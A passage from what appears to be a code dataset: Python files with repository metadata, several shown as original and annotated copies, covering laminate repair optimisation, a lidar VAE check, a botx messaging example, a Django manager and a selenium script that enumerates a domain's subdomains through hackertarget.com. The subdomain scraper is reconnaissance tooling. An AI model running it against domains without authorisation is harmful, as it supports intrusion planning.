    :return: list where element i equals sum(loss[:i + 1]); an empty
        input yields an empty list (previously it raised IndexError).
    """
    cumulative = []
    running_total = 0
    for value in loss:
        running_total += value
        cumulative.append(running_total)
    return cumulative
def get_flops():
    """
    Build a tiny 25x16 @ 16x9 matmul graph and print the FLOP count as
    reported by the TensorFlow profiler versus the analytic value.

    NOTE(review): ``tf`` is never imported in this module, so calling
    this function raises NameError as written -- it needs
    ``import tensorflow as tf`` (kept as a note; tensorflow is not a
    dependency of this file).
    """
    g = tf.Graph()
    run_meta = tf.compat.v1.RunMetadata()
    with g.as_default():
        A = tf.Variable(tf.random.normal([25,16]))
        B = tf.Variable(tf.random.normal([16,9]))
        C = tf.matmul(A,B)
    opts = tf.compat.v1.profiler.ProfileOptionBuilder.float_operation()
    flops = tf.compat.v1.profiler.profile(g, run_meta=run_meta, cmd='op', options=opts)
    if flops is not None:
        # 2*m*k*n multiply-adds for an (m,k) x (k,n) matmul
        print('Flops should be ~',2*25*16*9)
        print('TF stats gives',flops.total_float_ops)
if __name__ == "__main__":
    # Smoke-test drivers for the dataset classes defined above.
    from configs import InputParser
    dataset = DataGeneratorTorch()
    data_loader = DataLoader(dataset, batch_size=4, shuffle=True)
    args = InputParser()
    data = DataGenerator(args)
    # Patches for a single fault category...
    training_data_single = data.input_data('cracks','train',plot=False)
    # ...and labelled patches across all fault categories.
    training_data_all = data.label_maker()
    dataTorch = data.toTorchDataset(is_train=True)
    data_loader_lmd = DataLoader(dataTorch, batch_size=4, shuffle=True)
    print("Done")
| 11,115 | 839 | 505 |
b9b60d6ad866148924253fa5069e7e37944c754b | 429 | py | Python | docs/src/development/sending_data/sending_data0.py | ExpressApp/pybotx | 97c8b1ce5d45a05567ed01d545cb43174a2dcbb9 | [
"MIT"
] | 13 | 2021-01-21T12:43:10.000Z | 2022-03-23T11:11:59.000Z | docs/src/development/sending_data/sending_data0.py | ExpressApp/pybotx | 97c8b1ce5d45a05567ed01d545cb43174a2dcbb9 | [
"MIT"
] | 259 | 2020-02-26T08:51:03.000Z | 2022-03-23T11:08:36.000Z | docs/src/development/sending_data/sending_data0.py | ExpressApp/pybotx | 97c8b1ce5d45a05567ed01d545cb43174a2dcbb9 | [
"MIT"
] | 5 | 2019-12-02T16:19:22.000Z | 2021-11-22T20:33:34.000Z | from uuid import UUID
from botx import Bot, SendingMessage
bot = Bot()
CHAT_ID = UUID("1f972f5e-6d17-4f39-be5b-f7e20f1b4d13")
BOT_ID = UUID("cc257e1c-c028-4181-a055-01e14ba881b0")
CTS_HOST = "my-cts.example.com"
| 22.578947 | 54 | 0.678322 | from uuid import UUID
from botx import Bot, SendingMessage
bot = Bot()
CHAT_ID = UUID("1f972f5e-6d17-4f39-be5b-f7e20f1b4d13")
BOT_ID = UUID("cc257e1c-c028-4181-a055-01e14ba881b0")
CTS_HOST = "my-cts.example.com"
async def some_function() -> None:
    """Send a fixed notification message to the configured chat via the bot."""
    # Build the outgoing message from the module-level bot/chat identifiers.
    message = SendingMessage(
        text="You were chosen by random.",
        bot_id=BOT_ID,
        host=CTS_HOST,
        chat_id=CHAT_ID,
    )
    await bot.send(message)
| 191 | 0 | 23 |
c528820d645082e6638ab570ab1da8de5ad7a2d4 | 9,573 | py | Python | src/repair_ss.py | noemiefedon/RELAY | 1bf9c27ee1bcf1be0a7652fcca0ea38dd47b14b8 | [
"MIT"
] | 1 | 2020-12-07T22:18:22.000Z | 2020-12-07T22:18:22.000Z | src/repair_ss.py | noemiefedon/RELAY | 1bf9c27ee1bcf1be0a7652fcca0ea38dd47b14b8 | [
"MIT"
] | null | null | null | src/repair_ss.py | noemiefedon/RELAY | 1bf9c27ee1bcf1be0a7652fcca0ea38dd47b14b8 | [
"MIT"
] | 1 | 2021-12-02T22:19:02.000Z | 2021-12-02T22:19:02.000Z | # -*- coding: utf-8 -*-
"""
Repair strategy
- repair_ss:
attempts at repairing a stacking sequence for the following constraints:
- damage tolerance
- contiguity
- disorientation
- 10% rule
- balance
"""
__version__ = '2.0'
__author__ = 'Noemie Fedon'
import sys
import numpy as np
import numpy.matlib
sys.path.append(r'C:\RELAY')
from src.parameters import Parameters
from src.constraints import Constraints
from src.objectives import objectives
from src.pretty_print import print_ss, print_list_ss
from src.repair_10_bal import repair_10_bal
from src.repair_10_bal import calc_mini_10
from src.repair_membrane import repair_membrane
from src.repair_flexural import repair_flexural
from src.repair_diso_contig import repair_diso_contig_list
from src.one_stack import check_ss_manufacturability
from src.lampam_functions import calc_lampam
def repair_ss(
        ss, constraints, parameters, lampam_target, obj_no_constraints=None,
        count_obj=False):
    """
    repairs stacking sequences to meet design and manufacturing guidelines
    and evaluates the performance of the repaired stacking sequence

    The repair process is deterministic and attempts at conducting minimal
    modification of the original stacking sequence with a preference for
    modifying outer plies that have the least influence on out-of-plane
    properties.

    step 1: repair for the 10% rule and balance
    step 2: refinement for in-plane lamination parameter convergence
    step 3: repair for disorientation and contiguity
    step 4: refinement for out-of-plane lamination parameter convergence
    (step 5: attribute a poor objective function value to unrepaired layups)

    OUTPUTS

    - (ss, success_flag[, obj][, n_obj_func_D_calls]) -- the tuple arity
      depends on ``obj_no_constraints`` and ``count_obj``; see the NOTE
      comments at the return sites below.

    INPUTS

    - ss: stacking sequence of the laminate
    - lampam_target: lamination parameter targets
    - constraints: instance of the class Constraints
    - parameters: instance of the class Parameters
    - count_obj: flag to count the number of objective function calls
    (- obj_no_constraints: objective function value of the initial stacking
    sequence with no consideration of design and manufacturing constraints)
    """
    # Keep a copy so the unmodified layup can be returned on failure.
    ss_ini = np.copy(ss)
    mini_10 = calc_mini_10(constraints, ss.size)
    # print('before repair')
    # print_ss(ss_ini)
    #--------------------------------------------------------------------------
    # step 1 / repair for the 10% rule and balance
    #--------------------------------------------------------------------------
    ss, ply_queue = repair_10_bal(ss, mini_10, constraints)
    # print('after repair 10 and balance')
    # print_ss(ss)
    # print(ply_queue)
    #--------------------------------------------------------------------------
    # step 2 / improvement of the in-plane lamination parameter convergence
    #--------------------------------------------------------------------------
    ss_list, ply_queue_list, _ = repair_membrane(
        ss=ss,
        ply_queue=ply_queue,
        mini_10=mini_10,
        in_plane_coeffs=parameters.weighting_finalA,
        parameters=parameters,
        constraints=constraints,
        lampam_target=lampam_target)
    # print('after repair for membrane properties')
    # for ind in range(len(ss_list)):
    #     print('ind', ind)
    #     print('ss_list[ind]', ss_list[ind])
    #     print('ply_queue_list[ind]', ply_queue_list[ind])
    #     if not is_ten_percent_rule(constraints, stack=ss_list[ind],
    #                                ply_queue=ply_queue_list[ind]):
    #         print('lampam_target', lampam_target[0:4])
    #         raise Exception('10% rule not satisfied membrane')
    # print('ss_list[0]')
    # print_ss(ss_list[0])
    # print('ply_queue_list[0]', ply_queue_list[0])
    #--------------------------------------------------------------------------
    # step 3 / repair for disorientation and contiguity
    #--------------------------------------------------------------------------
    ss, completed_inward, completed_outward, ind = repair_diso_contig_list(
        ss_list, ply_queue_list, constraints,
        parameters.n_D1)
    # print('completed_inward, completed_outward, ind',
    #       completed_inward, completed_outward, ind)
    if not completed_outward:
        # Repair failed: hand back the *initial* stacking sequence.
        # NOTE(review): the returned tuple arity differs depending on
        # whether obj_no_constraints was supplied -- callers must match.
        if obj_no_constraints is None:
            if count_obj:
                return ss_ini, False, 0
            else:
                return ss_ini, False
        if count_obj:
            return ss_ini, False, 1e10, 0
        else:
            return ss_ini, False, 1e10
    # print('successful repair for disorientation and/or contiguity')
    # print_ss(ss)
    #--------------------------------------------------------------------------
    # step 4 / improvement of the out-of-plane lamination parameter convergence
    #--------------------------------------------------------------------------
    ss = repair_flexural(
        ss=ss,
        out_of_plane_coeffs=parameters.weighting_finalD,
        lampam_target=lampam_target,
        constraints=constraints,
        parameters=parameters,
        count_obj=count_obj)
    # When count_obj is set, repair_flexural returns a (ss, call_count) pair.
    if count_obj:
        ss, n_obj_func_D_calls = ss
    # print('    after repair')
    # print_ss(ss)
    # print('lampam_target', lampam_target)
    if obj_no_constraints is None:
        if count_obj:
            return ss, True, n_obj_func_D_calls
        else:
            return ss, True
    #--------------------------------------------------------------------------
    # step 5 /
    #--------------------------------------------------------------------------
    # NOTE(review): this objective value is computed but then discarded --
    # the returns below hand back the hard-coded 1e10 penalty instead of
    # ``obj_no_constraints``. Confirm whether the computed value should be
    # returned.
    obj_no_constraints = objectives(
        lampam=calc_lampam(ss, constraints),
        lampam_target=lampam_target,
        lampam_weightings=parameters.lampam_weightings_final,
        constraints=constraints,
        parameters=parameters)
    if count_obj:
        return ss, True, 1e10, n_obj_func_D_calls
    else:
        return ss, True, 1e10
if __name__ == "__main__":
print('\n*** Test for the function repair_ss ***')
constraints = Constraints(
sym=True,
bal=True,
ipo=True,
dam_tol=False,
rule_10_percent=True,
diso=True,
contig=True,
delta_angle=45,
n_contig=5,
percent_0=10,
percent_45=0,
percent_90=10,
percent_135=0,
percent_45_135=10,
set_of_angles=[0, 45, -45, 90])
ss = np.array([45, 90, 45, 90, -45, -45, -45, -45, 90, 45, 45, 45,
90, -45, 0, 0, 0, -45, 90, 45, 45, 45, 90, -45,
-45, -45, -45, 90, 45, 90, 45], int)
ss_target = 60*np.ones((1,), dtype=int)
lampam_target = calc_lampam(ss_target)
#==========================================================================
# Optimiser Parameters
#==========================================================================
### Techniques to enforce the constraints
# repair to improve the convergence towards the in-plane lamination parameter
# targets
repair_membrane_switch = True
# repair to improve the convergence towards the out-of-plane lamination
# parameter targets
repair_flexural_switch = True
# balanced laminate scheme
balanced_scheme = False
# coefficient for the proportion of the laminate thickness that can be modified
# during the refinement for membrane properties in the repair process
p_A = 80
# number of plies in the last permutation during repair for disorientation
# and/or contiguity
n_D1 = 6
# number of ply shifts tested at each step of the re-designing process during
# refinement for flexural properties
n_D2 = 10
# number of times are redesigned during the refinement of flexural properties
n_D3 = 2
# Lamination parameters to be considered in the multi-objective functions
optimisation_type = 'D'
set_of_angles = np.array([-45, 0, 45, 90], int)
if optimisation_type == 'A':
if set_of_angles is np.array([-45, 0, 45, 90], int):
lampam_to_be_optimised = np.array([1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0])
else:
lampam_to_be_optimised = np.array([1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0])
if optimisation_type == 'D':
if set_of_angles is np.array([-45, 0, 45, 90], int):
lampam_to_be_optimised = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0])
else:
lampam_to_be_optimised = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1])
if optimisation_type == 'AD':
if set_of_angles is np.array([-45, 0, 45, 90], int):
lampam_to_be_optimised = np.array([1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0])
else:
lampam_to_be_optimised = np.array([1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1])
# Lamination parameters sensitivities from the first-lebel optimiser
first_level_sensitivities = np.ones((12,), float)
parameters = Parameters(
constraints=constraints,
p_A=p_A,
n_D1=n_D1,
n_D2=n_D2,
n_D3=n_D3,
first_level_sensitivities=first_level_sensitivities,
lampam_to_be_optimised=lampam_to_be_optimised,
repair_membrane_switch=repair_membrane_switch,
repair_flexural_switch=repair_flexural_switch)
ss, completed, n_obj_func_D_calls = repair_ss(
ss, constraints, parameters, lampam_target, count_obj=True)
print('Repair successful?', completed)
print_ss(ss, 20)
print('n_obj_func_D_calls', n_obj_func_D_calls)
check_ss_manufacturability(ss, constraints)
| 39.8875 | 83 | 0.598872 | # -*- coding: utf-8 -*-
"""
Repair strategy
- repair_ss:
attempts at repairing a stacking sequence for the following constraints:
- damage tolerance
- contiguity
- disorientation
- 10% rule
- balance
"""
__version__ = '2.0'
__author__ = 'Noemie Fedon'
import sys
import numpy as np
import numpy.matlib
sys.path.append(r'C:\RELAY')
from src.parameters import Parameters
from src.constraints import Constraints
from src.objectives import objectives
from src.pretty_print import print_ss, print_list_ss
from src.repair_10_bal import repair_10_bal
from src.repair_10_bal import calc_mini_10
from src.repair_membrane import repair_membrane
from src.repair_flexural import repair_flexural
from src.repair_diso_contig import repair_diso_contig_list
from src.one_stack import check_ss_manufacturability
from src.lampam_functions import calc_lampam
def repair_ss(
    ss, constraints, parameters, lampam_target, obj_no_constraints=None,
    count_obj=False):
    """
    repairs a stacking sequence to meet design and manufacturing guidelines
    and evaluates the performance of the repaired stacking sequence

    The repair process is deterministic and attempts at conducting minimal
    modification of the original stacking sequence with a preference for
    modifying outer plies that have the least influence on out-of-plane
    properties.

    step 1: repair for the 10% rule and balance
    step 2: refinement for in-plane lamination parameter convergence
    step 3: repair for disorientation and contiguity
    step 4: refinement for out-of-plane lamination parameter convergence
    (step 5: attribute a poor objective function value to unrepaired layups)

    INPUTS

    - ss: stacking sequence of the laminate
    - constraints: instance of the class Constraints
    - parameters: instance of the class Parameters
    - lampam_target: lamination parameter targets
    - count_obj: flag to count the number of objective function calls
    - obj_no_constraints: objective function value of the initial stacking
      sequence with no consideration of design and manufacturing constraints

    OUTPUTS

    The shape of the returned tuple depends on the inputs:
    - obj_no_constraints is None, count_obj False: (ss, success)
    - obj_no_constraints is None, count_obj True:  (ss, success, n_D_calls)
    - obj_no_constraints given,   count_obj False: (ss, success, 1e10)
    - obj_no_constraints given,   count_obj True:  (ss, success, 1e10, n_D_calls)
    where success is False (and the original ss is returned unchanged) when
    the repair for disorientation/contiguity could not be completed, and
    n_D_calls is the number of out-of-plane objective function evaluations.
    """
    # keep a copy of the incoming layup so it can be returned untouched on failure
    ss_ini = np.copy(ss)
    # minimum ply counts per fibre direction required by the 10% rule
    mini_10 = calc_mini_10(constraints, ss.size)
    #--------------------------------------------------------------------------
    # step 1 / repair for the 10% rule and balance
    #--------------------------------------------------------------------------
    # ply_queue holds plies pulled out of the layup, awaiting re-insertion
    ss, ply_queue = repair_10_bal(ss, mini_10, constraints)
    #--------------------------------------------------------------------------
    # step 2 / improvement of the in-plane lamination parameter convergence
    #--------------------------------------------------------------------------
    # several candidate layups are produced; step 3 selects among them
    ss_list, ply_queue_list, _ = repair_membrane(
        ss=ss,
        ply_queue=ply_queue,
        mini_10=mini_10,
        in_plane_coeffs=parameters.weighting_finalA,
        parameters=parameters,
        constraints=constraints,
        lampam_target=lampam_target)
    #--------------------------------------------------------------------------
    # step 3 / repair for disorientation and contiguity
    #--------------------------------------------------------------------------
    ss, completed_inward, completed_outward, ind = repair_diso_contig_list(
        ss_list, ply_queue_list, constraints,
        parameters.n_D1)
    if not completed_outward:
        # unsuccessful repair for disorientation and/or contiguity:
        # hand back the untouched original layup with success = False
        if obj_no_constraints is None:
            if count_obj:
                return ss_ini, False, 0
            else:
                return ss_ini, False
        if count_obj:
            return ss_ini, False, 1e10, 0
        else:
            return ss_ini, False, 1e10
    #--------------------------------------------------------------------------
    # step 4 / improvement of the out-of-plane lamination parameter convergence
    #--------------------------------------------------------------------------
    ss = repair_flexural(
        ss=ss,
        out_of_plane_coeffs=parameters.weighting_finalD,
        lampam_target=lampam_target,
        constraints=constraints,
        parameters=parameters,
        count_obj=count_obj)
    if count_obj:
        # repair_flexural returns (ss, call count) when counting is requested
        ss, n_obj_func_D_calls = ss
    if obj_no_constraints is None:
        if count_obj:
            return ss, True, n_obj_func_D_calls
        else:
            return ss, True
    #--------------------------------------------------------------------------
    # step 5 /
    #--------------------------------------------------------------------------
    # NOTE(review): the objective value computed here is discarded and 1e10 is
    # returned unconditionally -- confirm this is the intended behaviour.
    obj_no_constraints = objectives(
        lampam=calc_lampam(ss, constraints),
        lampam_target=lampam_target,
        lampam_weightings=parameters.lampam_weightings_final,
        constraints=constraints,
        parameters=parameters)
    if count_obj:
        return ss, True, 1e10, n_obj_func_D_calls
    else:
        return ss, True, 1e10
if __name__ == "__main__":
    # Demo / manual test of repair_ss on a 31-ply laminate.
    print('\n*** Test for the function repair_ss ***')
    constraints = Constraints(
        sym=True,
        bal=True,
        ipo=True,
        dam_tol=False,
        rule_10_percent=True,
        diso=True,
        contig=True,
        delta_angle=45,
        n_contig=5,
        percent_0=10,
        percent_45=0,
        percent_90=10,
        percent_135=0,
        percent_45_135=10,
        set_of_angles=[0, 45, -45, 90])
    ss = np.array([45, 90, 45, 90, -45, -45, -45, -45, 90, 45, 45, 45,
                   90, -45, 0, 0, 0, -45, 90, 45, 45, 45, 90, -45,
                   -45, -45, -45, 90, 45, 90, 45], int)
    # target lamination parameters taken from a single 60-degree ply
    ss_target = 60*np.ones((1,), dtype=int)
    lampam_target = calc_lampam(ss_target)
    #==========================================================================
    # Optimiser Parameters
    #==========================================================================
    ### Techniques to enforce the constraints
    # repair to improve the convergence towards the in-plane lamination
    # parameter targets
    repair_membrane_switch = True
    # repair to improve the convergence towards the out-of-plane lamination
    # parameter targets
    repair_flexural_switch = True
    # balanced laminate scheme
    balanced_scheme = False
    # coefficient for the proportion of the laminate thickness that can be
    # modified during the refinement for membrane properties in the repair
    p_A = 80
    # number of plies in the last permutation during repair for disorientation
    # and/or contiguity
    n_D1 = 6
    # number of ply shifts tested at each step of the re-designing process
    # during refinement for flexural properties
    n_D2 = 10
    # number of times plies are redesigned during the refinement of flexural
    # properties
    n_D3 = 2
    # Lamination parameters to be considered in the multi-objective functions
    optimisation_type = 'D'
    set_of_angles = np.array([-45, 0, 45, 90], int)
    # BUG FIX: the standard-angle-set detection previously used `is` against a
    # freshly created array, which compares object identity and was therefore
    # always False; np.array_equal performs the intended element comparison.
    standard_angles = np.array_equal(set_of_angles, np.array([-45, 0, 45, 90], int))
    if optimisation_type == 'A':
        if standard_angles:
            lampam_to_be_optimised = np.array([1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0])
        else:
            lampam_to_be_optimised = np.array([1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0])
    if optimisation_type == 'D':
        if standard_angles:
            lampam_to_be_optimised = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 0])
        else:
            lampam_to_be_optimised = np.array([0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1])
    if optimisation_type == 'AD':
        if standard_angles:
            lampam_to_be_optimised = np.array([1, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0])
        else:
            lampam_to_be_optimised = np.array([1, 1, 1, 1, 0, 0, 0, 0, 1, 1, 1, 1])
    # Lamination parameter sensitivities from the first-level optimiser
    first_level_sensitivities = np.ones((12,), float)
    parameters = Parameters(
        constraints=constraints,
        p_A=p_A,
        n_D1=n_D1,
        n_D2=n_D2,
        n_D3=n_D3,
        first_level_sensitivities=first_level_sensitivities,
        lampam_to_be_optimised=lampam_to_be_optimised,
        repair_membrane_switch=repair_membrane_switch,
        repair_flexural_switch=repair_flexural_switch)
    ss, completed, n_obj_func_D_calls = repair_ss(
        ss, constraints, parameters, lampam_target, count_obj=True)
    print('Repair successful?', completed)
    print_ss(ss, 20)
    print('n_obj_func_D_calls', n_obj_func_D_calls)
    check_ss_manufacturability(ss, constraints)
| 0 | 0 | 0 |
1d6bc2617865ad3a16bc19f3c20563f15c78f3ea | 1,488 | py | Python | navrep/scripts/check_vae1d.py | ReykCS/navrep | 22ee4727268188414a8121f069e45c2ab798ca19 | [
"MIT"
] | 48 | 2020-11-26T10:16:08.000Z | 2022-03-24T15:22:08.000Z | navrep/scripts/check_vae1d.py | ReykCS/navrep | 22ee4727268188414a8121f069e45c2ab798ca19 | [
"MIT"
] | 1 | 2021-12-14T02:08:18.000Z | 2022-03-14T09:17:25.000Z | navrep/scripts/check_vae1d.py | ReykCS/navrep | 22ee4727268188414a8121f069e45c2ab798ca19 | [
"MIT"
] | 18 | 2020-12-09T08:37:43.000Z | 2022-03-30T06:56:38.000Z | from __future__ import print_function
import numpy as np
import os
from sensor_msgs.msg import LaserScan
from navrep.tools.data_extraction import archive_to_lidar_dataset
from navrep.models.vae1d import Conv1DVAE, reset_graph
# When True, each reconstructed scan is plotted next to the original.
DEBUG_PLOTTING = True

# Parameters for training
batch_size = 100
N_SCANS_PER_BATCH = 1
NUM_EPOCH = 100
DATA_DIR = "record"
HOME = os.path.expanduser("~")
# scans are normalized by this maximum range before entering the VAE
MAX_LIDAR_DIST = 25.0
vae_model_path = os.path.expanduser("~/navrep/models/V/vae1d.json")
# create network
reset_graph()
vae = Conv1DVAE(batch_size=batch_size, is_training=False)
# load trained weights
vae.load_json(vae_model_path)
# create training dataset
dataset = archive_to_lidar_dataset("~/navrep/datasets/V/ian", limit=180)
if len(dataset) == 0:
    raise ValueError("no scans found, exiting")
print(len(dataset), "scans in dataset.")
# split into batches:
total_length = len(dataset)
num_batches = len(dataset)
# template ROS LaserScan message (1080-beam lidar)
dummy_msg = LaserScan()
dummy_msg.range_max = 100.0
dummy_msg.ranges = range(1080)
for idx in range(num_batches):
    batch = dataset[idx:idx+N_SCANS_PER_BATCH]
    scans = batch
    # FIX: np.float was deprecated and removed in numpy>=1.24; the builtin
    # float is the exact type it used to alias, so behaviour is unchanged.
    # NOTE(review): clipping to an upper bound of MAX_LIDAR_DIST *after*
    # dividing by MAX_LIDAR_DIST looks like it should be 1.0 -- confirm the
    # intended normalization.
    obs = np.clip(scans.astype(float) / MAX_LIDAR_DIST, 0.0, MAX_LIDAR_DIST)
    obs = obs.reshape(N_SCANS_PER_BATCH, 1080, 1)
    # reconstruct the scan through the trained 1D VAE
    obs_pred = vae.encode_decode(obs)
    if DEBUG_PLOTTING:  # was a hard-coded `if True:`; use the intended flag
        import matplotlib.pyplot as plt
        plt.ion()
        plt.figure("rings")
        plt.cla()
        plt.plot(obs[0,:,0])
        plt.plot(obs_pred[0,:,0])
        plt.title(idx)
        # update the interactive figure
        plt.pause(0.01)
| 24 | 79 | 0.715726 | from __future__ import print_function
import numpy as np
import os
from sensor_msgs.msg import LaserScan
from navrep.tools.data_extraction import archive_to_lidar_dataset
from navrep.models.vae1d import Conv1DVAE, reset_graph
# Flag intended to gate the plotting block below (see `if True:` note there).
DEBUG_PLOTTING = True
# Parameters for training
batch_size = 100
N_SCANS_PER_BATCH = 1
NUM_EPOCH = 100
DATA_DIR = "record"
HOME = os.path.expanduser("~")
# scans are normalized by this maximum range before entering the VAE
MAX_LIDAR_DIST = 25.0
vae_model_path = os.path.expanduser("~/navrep/models/V/vae1d.json")
# create network
reset_graph()
vae = Conv1DVAE(batch_size=batch_size, is_training=False)
# load trained weights from disk
vae.load_json(vae_model_path)
# create training dataset
dataset = archive_to_lidar_dataset("~/navrep/datasets/V/ian", limit=180)
if len(dataset) == 0:
    raise ValueError("no scans found, exiting")
print(len(dataset), "scans in dataset.")
# split into batches:
total_length = len(dataset)
num_batches = len(dataset)
# template ROS LaserScan message (1080 beams)
dummy_msg = LaserScan()
dummy_msg.range_max = 100.0
dummy_msg.ranges = range(1080)
for idx in range(num_batches):
    batch = dataset[idx:idx+N_SCANS_PER_BATCH]
    scans = batch
    # NOTE(review): np.float was removed in numpy>=1.24 (it aliased the
    # builtin float), so this line crashes on modern numpy. Also, the upper
    # clip bound of MAX_LIDAR_DIST on data already divided by MAX_LIDAR_DIST
    # looks like it should be 1.0 -- confirm.
    obs = np.clip(scans.astype(np.float) / MAX_LIDAR_DIST, 0.0, MAX_LIDAR_DIST)
    obs = obs.reshape(N_SCANS_PER_BATCH, 1080, 1)
    # reconstruct the scan through the trained 1D VAE
    obs_pred = vae.encode_decode(obs)
    if True:  # always on; presumably meant to test DEBUG_PLOTTING instead
        import matplotlib.pyplot as plt
        plt.ion()
        plt.figure("rings")
        plt.cla()
        plt.plot(obs[0,:,0])
        plt.plot(obs_pred[0,:,0])
        plt.title(idx)
        # update the interactive figure
        plt.pause(0.01)
| 0 | 0 | 0 |
8fc85758ed23c6729ca478f239feae24bd8a47fe | 2,320 | py | Python | module/passive/dns_record.py | b1ackc4t/getdomain | 0d1d31c9abf1d3293d113bff46c400b246434807 | [
"Apache-2.0"
] | null | null | null | module/passive/dns_record.py | b1ackc4t/getdomain | 0d1d31c9abf1d3293d113bff46c400b246434807 | [
"Apache-2.0"
] | null | null | null | module/passive/dns_record.py | b1ackc4t/getdomain | 0d1d31c9abf1d3293d113bff46c400b246434807 | [
"Apache-2.0"
] | 1 | 2021-11-24T09:22:38.000Z | 2021-11-24T09:22:38.000Z | # modules in standard library
import re
from urllib.parse import urlparse
import requests
from selenium import webdriver
from selenium.webdriver.common.keys import Keys #需要引入 keys 包
import time
def main(domain):
    """
    Entry point: collect the subdomains of *domain* via the hackertarget
    DNS host-record lookup.

    :param domain: target domain, e.g. 'example.com'
    :return: list of discovered subdomain strings
    """
    collector = DnsRecord(domain)
    return collector.get_by_hackertarget()
if __name__ == '__main__':
    # Try things out in this file first; submit once subdomain collection works.
    print(main("hubu.edu.cn"))  # print the subdomains of hubu.edu.cn
import re
from urllib.parse import urlparse
import requests
from selenium import webdriver
from selenium.webdriver.common.keys import Keys #需要引入 keys 包
import time
class DnsRecord(object):
    """Collects subdomains of a domain by driving Firefox through the
    hackertarget.com "find DNS host records" page."""

    def __init__(self, domain):
        """
        Store basic state for the scan.

        :param domain: the target domain to enumerate subdomains for
        """
        self.domain = domain
        # session/headers are kept as instance state; the hackertarget lookup
        # itself goes through selenium, not requests.
        self.session = requests.Session()
        self.headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'Accept-Language': 'en-US,en;q=0.8',
            'Accept-Encoding': 'gzip',
        }

    def get_by_hackertarget(self):
        """
        Query https://hackertarget.com/find-dns-host-records/ and return the
        unique subdomains found in the response.

        :return: list of subdomain strings (empty when nothing was parsed)
        """
        subdomains = []
        base_url = "https://hackertarget.com/find-dns-host-records/"
        driver = webdriver.Firefox()  # open the browser
        try:
            driver.get(base_url)  # load the lookup page
            # locate the query box by name, type the domain and press ENTER
            driver.find_element_by_name("theinput").send_keys(self.domain)
            driver.find_element_by_name("theinput").send_keys(Keys.ENTER)
            time.sleep(3)  # crude wait for the results to render
            # response element holds the domain/IP records as plain text
            text = driver.find_element_by_id("formResponse").text
            link_regx = re.compile('(.*?)' + self.domain)  # capture text before the domain
            links = link_regx.findall(text)
            try:
                for link in links:
                    if not link.startswith('http'):
                        link = "http://" + link + self.domain
                    subdomain = urlparse(link).netloc
                    if subdomain not in subdomains and subdomain != self.domain:
                        subdomains.append(subdomain.strip())
            except Exception:
                # best effort: ignore entries that fail to parse
                pass
            return subdomains
        finally:
            # BUG FIX: driver.quit() was previously placed after `return`, so
            # it never executed and every call leaked a Firefox process.
            driver.quit()
def main(domain):
    """
    Main entry point -- just call it to collect the subdomains.

    :param domain: target domain to enumerate
    :return: list of subdomains found via the hackertarget lookup
    """
    dns_record = DnsRecord(domain)
    set1 = dns_record.get_by_hackertarget()
    return set1
if __name__ == '__main__':
    # Try things out in this file first; submit once subdomain collection works.
    print(main("hubu.edu.cn"))  # print the subdomains of hubu.edu.cn
878ce46586d03f4554547045ef951e1fae7509e8 | 41 | py | Python | venv/lib/python3.6/encodings/utf_16_be.py | JamesMusyoka/Blog | fdcb51cf4541bbb3b9b3e7a1c3735a0b1f45f0b5 | [
"Unlicense"
] | 2 | 2019-04-17T13:35:50.000Z | 2021-12-21T00:11:36.000Z | venv/lib/python3.6/encodings/utf_16_be.py | JamesMusyoka/Blog | fdcb51cf4541bbb3b9b3e7a1c3735a0b1f45f0b5 | [
"Unlicense"
] | 2 | 2021-03-31T19:51:24.000Z | 2021-06-10T23:05:09.000Z | venv/lib/python3.6/encodings/utf_16_be.py | JamesMusyoka/Blog | fdcb51cf4541bbb3b9b3e7a1c3735a0b1f45f0b5 | [
"Unlicense"
] | 2 | 2019-10-01T08:47:35.000Z | 2020-07-11T06:32:16.000Z | /usr/lib/python3.6/encodings/utf_16_be.py | 41 | 41 | 0.829268 | /usr/lib/python3.6/encodings/utf_16_be.py | 0 | 0 | 0 |
6ab189934782a1fb160cd1818c8c88eaeb7c5a43 | 1,110 | py | Python | interstitial/managers.py | invisiblehands/django-interstitial | 04bd811e180c8bb94bad04198228acbf6c5e7cff | [
"MIT"
] | null | null | null | interstitial/managers.py | invisiblehands/django-interstitial | 04bd811e180c8bb94bad04198228acbf6c5e7cff | [
"MIT"
] | null | null | null | interstitial/managers.py | invisiblehands/django-interstitial | 04bd811e180c8bb94bad04198228acbf6c5e7cff | [
"MIT"
] | null | null | null | from datetime import datetime
from django.db import models
from django.conf import settings
from django.core.cache import get_cache
| 27.75 | 65 | 0.626126 | from datetime import datetime
from django.db import models
from django.conf import settings
from django.core.cache import get_cache
class InterstitialManager(models.Manager):
    """Manager that resolves which interstitial (if any) should be shown."""

    def get_interstitial(self):
        """
        Return the active interstitial whose start/end window covers the
        current time, or None. The result is cached for one hour unless
        settings.INTERSTITIAL_CACHE is set to a falsy value.
        """
        caching = getattr(settings, 'INTERSTITIAL_CACHE', True)
        if caching:
            cache = get_cache('default')
            interstitial = cache.get('interstitial')
            if interstitial:
                return interstitial
        today = datetime.now()
        interstitial = self.filter(active=True).first()
        if interstitial:
            if interstitial.start and interstitial.start > today:
                # scheduled for the future: nothing to show yet
                interstitial = None
            # BUG FIX: this second check used to run even after the first one
            # set interstitial to None, raising AttributeError; make it elif.
            elif interstitial.end and interstitial.end <= today:
                # already expired
                interstitial = None
        if caching:
            cache.set('interstitial', interstitial, 60 * 60)
        return interstitial

    def get_for_user(self, user):
        """
        Return the interstitial visible to *user*: drafts are shown only to
        staff, anything else is shown to everyone. May return None.
        """
        interstitial = self.get_interstitial()
        if interstitial and interstitial.draft:
            # NOTE(review): is_staff is invoked as a method here; on the stock
            # Django user model it is a boolean attribute -- confirm the
            # project's user model actually defines a callable.
